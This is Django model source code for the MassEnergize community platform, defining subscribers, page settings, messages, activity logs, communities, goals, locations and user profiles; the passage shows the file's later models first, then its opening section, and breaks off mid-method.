self.simple_json() class Meta: ordering = ("name",) db_table = "billing_statements" class Subscriber(models.Model): """ A class used to represent a subscriber / someone who wants to join the massenergize mailist Attributes ---------- name : str name of the statement. """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) email = models.EmailField(blank=False, db_index=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, db_index=True ) created_at = models.DateTimeField(auto_now_add=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self) res["community"] = None if not self.community else self.community.info() return res def full_json(self): return self.simple_json() class Meta: db_table = "subscribers" unique_together = [["email", "community"]] class EmailCategory(models.Model): """ A class tha represents an email preference that a user or subscriber can subscribe to. Attributes ---------- name : str the name for this email preference community: int Foreign Key to the community this email category is associated with is_global: boolean True if this email category should appear in all the communities """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, db_index=True) community = models.ForeignKey(Community, db_index=True, on_delete=models.CASCADE) is_global = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): res = self.simple_json() res["community"] = get_json_if_not_none(self.community) return res class Meta: db_table = "email_categories" unique_together = [["name", "community"]] verbose_name_plural = "Email Categories" class SubscriberEmailPreference(models.Model): """ Represents the email preferences of each subscriber. For a subscriber might want marketing emails but not promotion emails etc Attributes ---------- subscriber: int Foreign Key to a subscriber email_category: int Foreign key to an email category """ id = models.AutoField(primary_key=True) subscriber = models.ForeignKey(Subscriber, on_delete=models.CASCADE, db_index=True) subscribed_to = models.ForeignKey(EmailCategory, on_delete=models.CASCADE) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return "%s - %s" % (self.subscriber, self.subscribed_to) def simple_json(self): return { "id": self.id, "subscriber": get_json_if_not_none(self.subscriber), "subscribed_to": get_json_if_not_none(self.subscribed_to), } def full_json(self): return self.simple_json() class Meta: db_table = "subscriber_email_preferences" class PageSettings(models.Model): """ Represents the basic page settings. This is a base class, which contains common attributes to most page settings. Attributes ---------- Community: Foreign key: Which community this applies to title: str Title of the page (if different than default) sub_title: str Sub-title or tag-line of the page (if different than default) description: str Description of the page (if different than default) images: ForeignKeys: Links to one or more Media records featured_video_link: str A link to a featured video (on YouTube or elsewhere) more_info: JSON - extraneous information is_deleted: boolean - whether this page was deleted from the platform (perhaps with it's community) is_published: boolean - whether this page is live is_template: boolean - whether this is a template to be copied """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res class Meta: abstract = True class HomePageSettings(models.Model): """ Represents the community's Home page settings. Attributes ---------- Community: Foreign key: Which community this applies to title: str Title of the page (if different than default) sub_title: str Sub-title or tag-line of the page (if different than default) description: str Description of the page (if different than default) images: ForeignKeys: Links to one or more Media records featured_video_link: str A link to a featured video (on YouTube or elsewhere) specific to home page: ---------------------- featured_links : JSON - links to page redirects for the big buttons featured_events : links to one or more Event records featured_stats : lins to one or more Data records show_featured_events : boolean - whether to show featured events section show_featured_stats : boolean - whether to show featured stats section show_featured_links : boolean - whether to show featured links section show_featured_video : boolean - whether to show featured video featured_stats_description : str - descriptive text on what the stats are about featured_events_description : str - descriptive text on the featured events specific to the footer on all pages: ------------------------------------ show_footer_subscribe : Boolean - whether to show newsletter subscribe box show_footer_social_media : Boolean - whether to show footer social media icons social_media_links: str Links to social media, such as: ["facebook:www.facebook.com/coolerconcord/,instgram:www.instagram.com/coolerconcord/"] more_info: JSON - extraneous information is_deleted: boolean - whether this page was deleted from the platform (perhaps with it's community) is_published: boolean - whether this page is live is_template: boolean - whether this is a template to be copied """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, related_name="homepage_images", blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_links = models.JSONField(blank=True, null=True) featured_events = models.ManyToManyField(Event, blank=True) featured_stats = models.ManyToManyField(Data, blank=True) show_featured_events = models.BooleanField(default=True, blank=True) show_featured_stats = models.BooleanField(default=True, blank=True) show_featured_links = models.BooleanField(default=True, blank=True) show_featured_video = models.BooleanField(default=False, blank=True) featured_stats_subtitle = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_stats_description = models.CharField(max_length=LONG_STR_LEN, blank=True) featured_events_subtitle = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_events_description = models.CharField(max_length=LONG_STR_LEN, blank=True) show_footer_subscribe = models.BooleanField(default=True, blank=True) show_footer_social_media = models.BooleanField(default=True, blank=True) social_media_links = models.JSONField(blank=True, null=True) is_template = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return "HomePageSettings - %s" % (self.community) def simple_json(self): res = model_to_dict( self, exclude=["images", "featured_events", "featured_stats"] ) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] res["community"] = get_json_if_not_none(self.community) res["featured_events"] = [i.simple_json() for i in self.featured_events.all()] res["featured_stats"] = [i.simple_json() for i in self.featured_stats.all()] return res class Meta: db_table = "home_page_settings" verbose_name_plural = "HomePageSettings" class ActionsPageSettings(models.Model): """ Represents the community's Actions page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ActionsPageSettings - %s" % (self.community) class Meta: db_table = "actions_page_settings" verbose_name_plural = "ActionsPageSettings" class ContactUsPageSettings(models.Model): """ Represents the community's ContactUs page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ContactUsPageSettings - %s" % (self.community) class Meta: db_table = "contact_us_page_settings" verbose_name_plural = "ContactUsPageSettings" class DonatePageSettings(models.Model): """ Represents the communities Donate page settings. Attributes ---------- see description under PageSettings one additional field: donation_link : str - link to donation url (if not contained within the HTML description) """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) donation_link = models.CharField(max_length=LONG_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "DonatePageSettings - %s" % (self.community) class Meta: db_table = "donate_page_settings" verbose_name_plural = "DonatePageSettings" class AboutUsPageSettings(models.Model): """ Represents the community's AboutUs page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) # image = models.ForeignKey(Media, blank=True, null=True, on_delete=models.SET_NULL) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() # res['images'] = [i.simple_json() for i in self.images.all()] res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "AboutUsPageSettings - %s" % (self.community) class Meta: db_table = "about_us_page_settings" verbose_name_plural = "AboutUsPageSettings" class ImpactPageSettings(models.Model): """ Represents the community's Impact page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ImpactPageSettings - %s" % (self.community) class Meta: db_table = "impact_page_settings" verbose_name_plural = "ImpactPageSettings" class TeamsPageSettings(PageSettings): """ Represents the community's Teams page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "TeamsPageSettings - %s" % (self.community) class Meta: db_table = "teams_page_settings" verbose_name_plural = "TeamsPageSettings" class VendorsPageSettings(PageSettings): """ Represents the community's Vendors page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "VendorsPageSettings - %s" % (self.community) class Meta: db_table = "vendors_page_settings" verbose_name_plural = "VendorsPageSettings" class EventsPageSettings(PageSettings): """ Represents the community's Events page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "EventsPageSettings - %s" % (self.community) class Meta: db_table = "events_page_settings" verbose_name_plural = "EventsPageSettings" class TestimonialsPageSettings(PageSettings): """ Represents the community's Testimonials page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "TestimonialsPageSettings - %s" % (self.community) class Meta: db_table = "testimonials_page_settings" verbose_name_plural = "TestimonialsPageSettings" class RegisterPageSettings(PageSettings): """ Represents the community's Registration page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "RegisterPageSettings - %s" % (self.community) class Meta: db_table = "register_page_settings" verbose_name_plural = "RegisterPageSettings" class SigninPageSettings(PageSettings): """ Represents the community's Signin page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "SigninPageSettings - %s" % (self.community) class Meta: db_table = "signin_page_settings" verbose_name_plural = "SigninPageSettings" class Message(models.Model): """ A class used to represent a Message sent on the MassEnergize Platform Attributes ---------- """ id = models.AutoField(primary_key=True) user_name = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) title = models.CharField(max_length=SHORT_STR_LEN) uploaded_file = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL ) email = models.EmailField(blank=True) user = models.ForeignKey( UserProfile, on_delete=models.SET_NULL, null=True, blank=True ) body = models.TextField(max_length=LONG_STR_LEN) community = models.ForeignKey( Community, blank=True, on_delete=models.SET_NULL, null=True ) team = models.ForeignKey(Team, blank=True, on_delete=models.SET_NULL, null=True) have_replied = models.BooleanField(default=False, blank=True) have_forwarded = models.BooleanField(default=False, blank=True) is_team_admin_message = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) archive = models.BooleanField(default=False, blank=True) starred = models.BooleanField(default=False, blank=True) response = models.CharField(max_length=LONG_STR_LEN, blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True, null=True) def __str__(self): return f"{self.title}" def simple_json(self): res = model_to_dict(self) res["community"] = get_summary_info(self.community) res["team"] = get_summary_info(self.team) res["user"] = get_summary_info(self.user) res["created_at"] = self.created_at.strftime("%Y-%m-%d %H:%M") return res def full_json(self): res = self.simple_json() res["uploaded_file"] = get_json_if_not_none(self.uploaded_file) return res class Meta: ordering = ("title",) db_table = "messages" class ActivityLog(models.Model): """ A class used to represent Activity Log on the MassEnergize Platform Attributes ---------- """ id = models.AutoField(primary_key=True) path = models.CharField(max_length=SHORT_STR_LEN, default="/") user = models.ForeignKey(UserProfile, on_delete=models.CASCADE, null=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, null=True) created_at = models.DateTimeField(auto_now_add=True) status = models.CharField(max_length=SHORT_STR_LEN, default="success", blank=True) trace = models.JSONField(blank=True, null=True) request_body = models.JSONField(blank=True, null=True) # add response or error field def __str__(self): return self.path def simple_json(self): return model_to_dict(self) def full_json(self): res = self.simple_json() res["user"] = get_json_if_not_none(self.user) res["community"] = get_json_if_not_none(self.community) return res class Meta: ordering = ("path",) db_table = "activity_logs" class Deployment(models.Model): """ A class used to represent Activity Log on the MassEnergize Platform Attributes ---------- """ id = models.AutoField(primary_key=True) version = models.CharField(max_length=SHORT_STR_LEN, default="") deploy_commander = models.CharField( max_length=SHORT_STR_LEN, default="", blank=True ) notes = models.CharField(max_length=LONG_STR_LEN, default="", blank=True) created_at = models.DateTimeField(auto_now_add=True) def __str__(self): return self.version def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: db_table = "deployments" ordering = ("-version",)
import datetime import json from django.db import models from django.db.models.fields import BooleanField, related from django.db.models.query_utils import select_related_descend from database.utils.constants import * from .utils.common import json_loader, get_json_if_not_none, get_summary_info from django.forms.models import model_to_dict from carbon_calculator.models import Action as CCAction import uuid CHOICES = json_loader("./database/raw_data/other/databaseFieldChoices.json") ZIP_CODE_AND_STATES = json_loader("./database/raw_data/other/states.json") class Location(models.Model): """ A class used to represent a geographical region. It could be a complete and proper address or just a city name, zipcode, county etc Attributes ---------- type : str the type of the location, whether it is a full address, zipcode only, etc street : str The street number if it is available city : str the name of the city if available county : str the name of the county if available state: str the name of the state if available more_info: JSON any anotheraction() dynamic information we would like to store about this location """ id = models.AutoField(primary_key=True) location_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("LOCATION_TYPES", {}).items() ) street = models.CharField(max_length=SHORT_STR_LEN, blank=True) unit_number = models.CharField(max_length=SHORT_STR_LEN, blank=True) zipcode = models.CharField(max_length=SHORT_STR_LEN, blank=True) city = models.CharField(max_length=SHORT_STR_LEN, blank=True) county = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) state = models.CharField( max_length=SHORT_STR_LEN, choices=ZIP_CODE_AND_STATES.items(), blank=True ) country = models.CharField(max_length=SHORT_STR_LEN, default="US", blank=True) more_info = models.JSONField(blank=True, null=True) def __str__(self): # show full loc regardless of tye type its labelled as loc = "" d = lambda: ", " if loc != "" else "" if self.street: loc += self.street if self.unit_number: loc += d() + "#" + self.unit_number if self.city: loc += d() + self.city if self.zipcode: loc += d() + self.zipcode if self.county: loc += d() + self.county if self.state: loc += d() + self.state if self.country and self.country != "US": loc += d() + self.country loc += "-" + self.location_type return loc def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: db_table = "locations" class Media(models.Model): """ A class used to represent any Media that is uploaded to this website Attributes ---------- name : SlugField The short name for this media. It cannot only contain letters, numbers, hypens and underscores. No spaces allowed. file : File the file that is to be stored. media_type: str the type of this media file whether it is an image, video, pdf etc. """ id = models.AutoField(primary_key=True) name = models.SlugField(max_length=SHORT_STR_LEN, blank=True) file = models.FileField(upload_to="media/") media_type = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) order = models.PositiveIntegerField(default=0, blank=True, null=True) def __str__(self): return str(self.id) + "-" + self.name + "(" + self.file.name + ")" def simple_json(self): return { "id": self.id, "url": self.file.url, } def full_json(self): return { "id": self.id, "name": self.name, "url": self.file.url, "media_type": self.media_type, } class Meta: db_table = "media" ordering = ("order", "name") class Policy(models.Model): """ A class used to represent a Legal Policy. For instance the Terms and Agreement Statement that users have to agree to during sign up. Attributes ---------- name : str name of the Legal Policy description: str the details of this policy communities_applied: how many communities this policy applies to. is_global: boolean True if this policy should apply to all the communities info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) is_global = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) more_info = models.JSONField(blank=True, null=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): # would this blow up because no community_set? res = model_to_dict(self) community = self.community_set.all().first() if community: res["community"] = get_json_if_not_none(community) return res class Meta: ordering = ("name",) db_table = "legal_policies" verbose_name_plural = "Legal Policies" class Goal(models.Model): """ A class used to represent a Goal Attributes ---------- name : str A short title for this goal status: str the status of this goal whether it has been achieved or not. description: More details about this goal target_date: Date at which goal should be achieved created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) description = models.TextField(max_length=LONG_STR_LEN, blank=True) target_number_of_households = models.PositiveIntegerField(default=0, blank=True) target_number_of_actions = models.PositiveIntegerField(default=0, blank=True) target_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) initial_number_of_households = models.PositiveIntegerField(default=0, blank=True) initial_number_of_actions = models.PositiveIntegerField(default=0, blank=True) initial_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) attained_number_of_households = models.PositiveIntegerField(default=0, blank=True) attained_number_of_actions = models.PositiveIntegerField(default=0, blank=True) attained_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) organic_attained_number_of_households = models.PositiveIntegerField( default=0, blank=True ) organic_attained_number_of_actions = models.PositiveIntegerField( default=0, blank=True ) organic_attained_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) target_date = models.DateField(null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.name} {' - Deleted' if self.is_deleted else ''}" def simple_json(self): return model_to_dict(self, exclude=["is_deleted"]) def full_json(self): return self.simple_json() class Meta: db_table = "goals" class Community(models.Model): """ A class used to represent a Community on this platform. Attributes ---------- name : str The short name for this Community subdomain : str (can only contain alphabets, numbers, hyphen and underscores) a primary unique identifier for this Community. They would need the same to access their website. For instance if the subdomain is wayland they would access their portal through wayland.massenergize.org owner: JSON information about the name, email and phone of the person who is supposed to be owner and main administrator when this Community account is opened. logo : int Foreign Key to Media that holds logo of community banner : int Foreign Key to Media that holds logo of community is_geographically_focused: boolean Information about whether this community is geographically focused or dispersed is_approved: boolean This field is set to True if the all due diligence has been done by the Super Admins and the community is not allowed to operate. created_at: DateTime The date and time that this community was created policies: ManyToMany policies created by community admins for this community created_at: DateTime The date and time of the last time any updates were made to the information about this community more_info: JSON any another dynamic information we would like to store about this location """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) subdomain = models.SlugField(max_length=SHORT_STR_LEN, unique=True, db_index=True) owner_name = models.CharField(max_length=SHORT_STR_LEN, default="Unknown") owner_email = models.EmailField(blank=False) owner_phone_number = models.CharField( blank=True, null=True, max_length=SHORT_STR_LEN ) about_community = models.TextField(max_length=LONG_STR_LEN, blank=True) logo = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="community_logo", ) banner = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="community_banner", ) favicon = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="community_favicon", ) goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL) is_geographically_focused = models.BooleanField(default=False, blank=True) # deprecated: location of community was originally a JSON string; now defined below in locations (link to Location model) location = models.JSONField(blank=True, null=True) # new - define the geographic area for a community (zipcodes, towns/cities, counties, states, countries) geography_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("COMMUNITY_GEOGRAPHY_TYPES", {}).items(), blank=True, null=True, ) # locations defines the range for geographic communities locations = models.ManyToManyField(Location, blank=True) policies = models.ManyToManyField(Policy, blank=True) is_approved = models.BooleanField(default=False, blank=True) accepted_terms_and_conditions = models.BooleanField(default=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return str(self.id) + " - " + self.name def info(self): return model_to_dict(self, ["id", "name", "subdomain"]) def simple_json(self): res = model_to_dict( self, [ "id", "name", "subdomain", "is_approved", "owner_phone_number", "owner_name", "owner_email", "is_geographically_focused", "is_published", "is_approved", "more_info", "location", ], ) res["logo"] = get_json_if_not_none(self.logo) res["favicon"] = get_json_if_not_none(self.favicon) return res def full_json(self): admin_group: CommunityAdminGroup = CommunityAdminGroup.objects.filter( community__id=self.pk ).first() if admin_group: admins = [a.simple_json() for a in admin_group.members.all()] else: admins = [] customDomain: CustomCommunityWebsiteDomain = ( CustomCommunityWebsiteDomain.objects.filter(community__id=self.pk) ) website = None if customDomain: website = customDomain.first().website # get the community goal goal = get_json_if_not_none(self.goal) or {} # goal defined consistently; not differently in two places if self.is_geographically_focused: goal[ "organic_attained_number_of_households" ] = RealEstateUnit.objects.filter(is_deleted=False, community=self).count() done_actions = UserActionRel.objects.filter( real_estate_unit__community=self, status="DONE" ).prefetch_related("action__calculator_action") else: community_members = CommunityMember.objects.filter( is_deleted=False, community=self ).select_related("user") users = [cm.user for cm in community_members] members_count = community_members.count() goal["organic_attained_number_of_households"] = members_count done_actions = UserActionRel.objects.filter( user__in=users, status="DONE" ).prefetch_related("action__calculator_action") goal["organic_attained_number_of_actions"] = done_actions.count() carbon_footprint_reduction = 0 for actionRel in done_actions: if actionRel.action and actionRel.action.calculator_action: carbon_footprint_reduction += ( actionRel.action.calculator_action.average_points ) goal["organic_attained_carbon_footprint_reduction"] = carbon_footprint_reduction locations = "" for loc in self.locations.all(): if locations != "": locations += ", " if self.geography_type == "ZIPCODE": l = loc.zipcode elif self.geography_type == "CITY": l = loc.city elif self.geography_type == "COUNTY": l = loc.county elif self.geography_type == "STATE": l = loc.state elif self.geography_type == "COUNTRY": l = loc.country else: l = loc.zipcode locations += l return { "id": self.id, "name": self.name, "subdomain": self.subdomain, "website": website, "owner_name": self.owner_name, "owner_email": self.owner_email, "owner_phone_number": self.owner_phone_number, "goal": goal, "about_community": self.about_community, "logo": get_json_if_not_none(self.logo), "favicon": get_json_if_not_none(self.favicon), "location": self.location, "is_approved": self.is_approved, "is_published": self.is_published, "is_geographically_focused": self.is_geographically_focused, "banner": get_json_if_not_none(self.banner), "created_at": self.created_at, "updated_at": self.updated_at, "more_info": self.more_info, "admins": admins, "geography_type": self.geography_type, "locations": locations, } class Meta: verbose_name_plural = "Communities" db_table = "communities" class RealEstateUnit(models.Model): """ A class used to represent a Real Estate Unit. Attributes ---------- unit_type : str The type of this unit eg. Residential, Commercial, etc location: Location the geographic address or location of this real estate unit created_at: DateTime The date and time that this real estate unity was added created_at: DateTime The date and time of the last time any updates were made to the information about this real estate unit """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) unit_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("REAL_ESTATE_TYPES", {}).items() ) community = models.ForeignKey( Community, null=True, on_delete=models.SET_NULL, blank=True ) location = models.JSONField(blank=True, null=True) # added 1/28/21 - redundant to location, address will have Zip code, defining which community the REU is in address = models.ForeignKey(Location, null=True, on_delete=models.SET_NULL) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def is_commercial(self): return self.unit_type == "C" def is_residential(self): return self.unit_type == "R" def __str__(self): return f"{self.community}|{self.unit_type}|{self.name}" def simple_json(self): # return model_to_dict(self) res = model_to_dict(self) res["location"] = get_json_if_not_none(self.address) return res def full_json(self): return self.simple_json() class Meta: db_table = "real_estate_units" class Role(models.Model): """ A class used to represent Role for users on the MassEnergize Platform Attributes ---------- name : str name of the role """ id = models.AutoField(primary_key=True) name = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("ROLE_TYPES", {}).items(), unique=True, ) description = models.TextField(max_length=LONG_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return CHOICES.get("ROLE_TYPES", {})[self.name] def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "roles" class UserProfile(models.Model): """ A class used to represent a MassEnergize User Note: Authentication is handled by firebase so we just need emails Attributes ---------- email : str email of the user. Should be unique. user_info: JSON a JSON representing the name, bio, etc for this user. bio: A short biography of this user is_super_admin: boolean True if this user is an admin False otherwise is_community_admin: boolean True if this user is an admin for a community False otherwise is_vendor: boolean True if this user is a vendor False otherwise other_info: JSON any another dynamic information we would like to store about this UserProfile created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal #TODO: roles field: if we have this do we need is_superadmin etc? also why # not just one? why many to many """ id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True) full_name = models.CharField(max_length=SHORT_STR_LEN, null=True) profile_picture = models.ForeignKey( Media, on_delete=models.SET_NULL, blank=True, null=True, related_name="profile_picture", ) preferred_name = models.CharField(max_length=SHORT_STR_LEN, null=True) email = models.EmailField(unique=True, db_index=True) user_info = models.JSONField(blank=True, null=True) real_estate_units = models.ManyToManyField( RealEstateUnit, related_name="user_real_estate_units", blank=True ) goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL) communities = models.ManyToManyField(Community, blank=True) roles = models.ManyToManyField(Role, blank=True) is_super_admin = models.BooleanField(default=False, blank=True) is_community_admin = models.BooleanField(default=False, blank=True) is_vendor = models.BooleanField(default=False, blank=True) other_info = models.JSONField(blank=True, null=True) accepts_terms_and_conditions = models.BooleanField(default=False, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) preferences = models.JSONField(default=dict, null=True, blank=True) visit_log = models.JSONField(default=list, null=True, blank=True) def __str__(self): return self.email def info(self): return model_to_dict(self, ["id", "email", "full_name"]) def simple_json(self): res = model_to_dict( self, [ "id", "full_name", "preferred_name", "email", "is_super_admin", "is_community_admin", ], ) res["joined"] = self.created_at.date() res["user_info"] = self.user_info res["profile_picture"] = get_json_if_not_none(self.profile_picture) res["communities"] = [ c.community.name for c in CommunityMember.objects.filter(user=self) ] res["households"] = [h.simple_json() for h in self.real_estate_units.all()] return res def update_visit_log(self, date_time): try: new_format = "%Y/%m/%d" date = date_time.strftime(new_format) # We adapt the old fomat to the new one if type(self.visit_log) == dict: old = self.visit_log new = [] for day in old.keys(): old_format = "%d/%m/%Y" dt_object = datetime.datetime.strptime(day, old_format) day = dt_object.strftime(new_format) new.append(day) self.visit_log = new if type(self.visit_log) == list: if len(self.visit_log) > 0: if date != self.visit_log[-1]: self.visit_log.append(date) else: self.visit_log.append(date) except Exception as e: print(e) return None, e def full_json(self): team_members = [t.team.info() for t in TeamMember.objects.filter(user=self)] community_members = CommunityMember.objects.filter(user=self) communities = [cm.community.info() for cm in community_members] # admin_at = [ // TODO: Remove -> because we stopped using this, and started using CommunityAdminGroupBelow # cm.community.info() # for cm in CommunityMember.objects.filter(user=self, is_admin=True) # ] data = model_to_dict( self, exclude=["real_estate_units", "communities", "roles"] ) data["joined"] = self.created_at.date() admin_at = [ get_json_if_not_none(c.community) for c in self.communityadmingroup_set.all() ] data["households"] = [h.simple_json() for h in self.real_estate_units.all()] data["goal"] = get_json_if_not_none(self.goal) data["communities"] = communities data["admin_at"] = admin_at data["teams"] = team_members data["profile_picture"] = 